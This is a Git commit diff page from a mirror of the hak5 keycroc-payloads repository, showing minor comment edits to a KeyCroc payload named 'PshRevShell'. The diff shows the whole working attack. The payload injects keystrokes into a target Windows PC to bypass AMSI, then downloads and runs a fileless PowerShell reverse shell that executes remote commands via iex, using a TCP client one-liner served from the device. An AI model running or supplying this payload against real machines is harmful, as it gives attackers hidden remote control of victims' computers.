hak5
/
keycroc-payloads
mirror of https://github.com/hak5/keycroc-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Minor update

pull/9/head
cerebro11 2020-07-29 01:17:22 +02:00 committed by GitHub
parent 81daa35a51
commit d0aa5bc7d9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 10 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
library/exploit/win_psh_rev_shell.txt
View File

@ -1,19 +1,18 @@
# Title: PshRevShell
# Description: A fileless Powershell reverse shell to the KeyCroc
# Description: A fileless PowerShell reverse shell to the KeyCroc
# Author: cerebro11
# Date: 28/07/2020
#
# A netcat Listener should be ran on the KeyCroc before running payload "nc -nvlp 4444"
# Requirements : gohttp
# A netcat listener should be ran on the KeyCroc before executing the payload (ex: "nc -nvlp 4444")
# Requirements: gohttp
MATCH __croc_revshell
LED SETUP
# Step 0 : Specify target's PC keyboard language
# Step 0: Specify target's PC keyboard language
#export DUCKY_LANG=fr
# Step 1 : Change to ETHERNET ATTACKMODE (Windows)
# Step 1: Change to ETHERNET ATTACKMODE (Windows)
LED SETUP
if [ ! -f "/tmp/vidpid" ]
then
ATTACKMODE RNDIS_ETHERNET HID VID_0X1234 PID_0X5678
@ -24,17 +23,16 @@ else
fi
QUACK DELAY 5000
# Step 2 : Get KeyCroc's LAN IP
# Step 2: Get KeyCroc's LAN IP
croc_ip=$(ifconfig usb0 | grep "inet addr" | awk {'print $2'} | cut -c 6-)
croc_port=4444
# Step 3 : Prepare scripts and run web service
# Step 3: Prepare scripts and run web service
mkdir -p /tmp/www
echo "\$client = New-Object System.Net.Sockets.TCPClient('${croc_ip}',${croc_port});\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" > /tmp/www/Invoke-PowerShellTcpOneLine.ps1
cd /tmp/www/ && gohttp -p 80 &
# Step 3 : Inject KeyStrokes to bypass AMSI and spawn reverse shell
# Step 4: Inject KeyStrokes to bypass AMSI and spawn reverse shell
LED ATTACK
QUACK LOCK
QUACK GUI-r
@ -48,7 +46,7 @@ QUACK STRING "IEX (New-Object Net.WebClient).DownloadString('http://${croc_ip}/I
QUACK ENTER
QUACK UNLOCK
# Step 4 : Clean
# Step 5: Clean
LED CLEAN
sleep 10
kill $(ps -C "gohttp -p 80" -o pid --no-headers)